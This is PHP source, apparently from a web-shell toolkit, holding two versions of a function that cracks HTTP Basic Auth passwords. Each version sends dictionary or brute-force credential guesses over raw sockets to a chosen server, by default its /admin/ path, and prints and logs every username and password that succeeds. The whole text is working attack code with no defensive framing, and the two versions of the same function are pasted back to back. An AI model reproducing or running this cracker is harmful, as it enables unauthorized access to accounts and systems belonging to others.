function authcrackeR() { global $errorbox, $et, $t, $hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } spliturL($_REQUEST['target'], $host, $page); $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($method == 'GET') { $page .= $data; } $dictionary = fopen($_REQUEST['dictionary'], 'r'); echo '<font color=blue>'; while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "{$errorbox} Can not connect to host{$et}"; break; } else { $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } } } } echo 'Done!</font>'; } else { echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>"; } }
function authcrackeR() { global $hcwd; if (!empty($_REQUEST['target'])) { if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) { $log = 1; $file = $_REQUEST['logfilE']; } else { $log = 0; } $data = ''; $method = $_REQUEST['method'] ? 'POST' : 'GET'; if (strstr($_REQUEST['target'], '?')) { $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1); $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?')); } $u = parse_url($_REQUEST['target']); $host = $u['host']; $page = $u['path']; $type = $_REQUEST['combo']; $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : ''; if ($method == 'GET') { $page .= $data; } echo '<font color=#FA0>'; if ($_REQUEST['mode'] == 'wl') { $dictionary = fopen($_REQUEST['dictionary'], 'r'); while (!feof($dictionary)) { if ($type) { $combo = trim(fgets($dictionary), " \n\r"); $user = substr($combo, 0, strpos($combo, ':')); $pass = substr($combo, strpos($combo, ':') + 1); } else { $pass = trim(fgets($dictionary), " \n\r"); } $so = @fsockopen($host, 80, $en, $es, 5); if (!$so) { echo "Can not connect to host"; break; } else { $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}"); if ($method == 'POST') { $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data); } $packet .= "\r\n\r\n"; $packet .= $data; fputs($so, $packet); $res = substr(fgets($so), 9, 2); fclose($so); if ($res == '20') { echo "U: {$user} P: {$pass}</br>"; if ($log) { file_add_contentS($file, "U: {$user} P: {$pass}\r\n"); } } } } } else { $code = ' $so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 ); $packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic " . base64_encode ( "' . $user . ':".$word )."\\r\\n"'; if ($method == "POST") { $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'"; } $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet ); $test= ( substr ( fgets ( $so ), 9, 2 ) == "20");'; echo $code; if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) { echo "<b>{$user}:{$res}</b><br />"; } } echo 'Done!</font>'; } else { echo ' <form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Auth cracker</label> </div><div class="fieldwrapper"> <label class="styled">Target:</label> <div class="thefield"> <input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" /> </div> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div><div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div> <div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="1">POST</option><option value="0">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script>toggle();</script>'; } }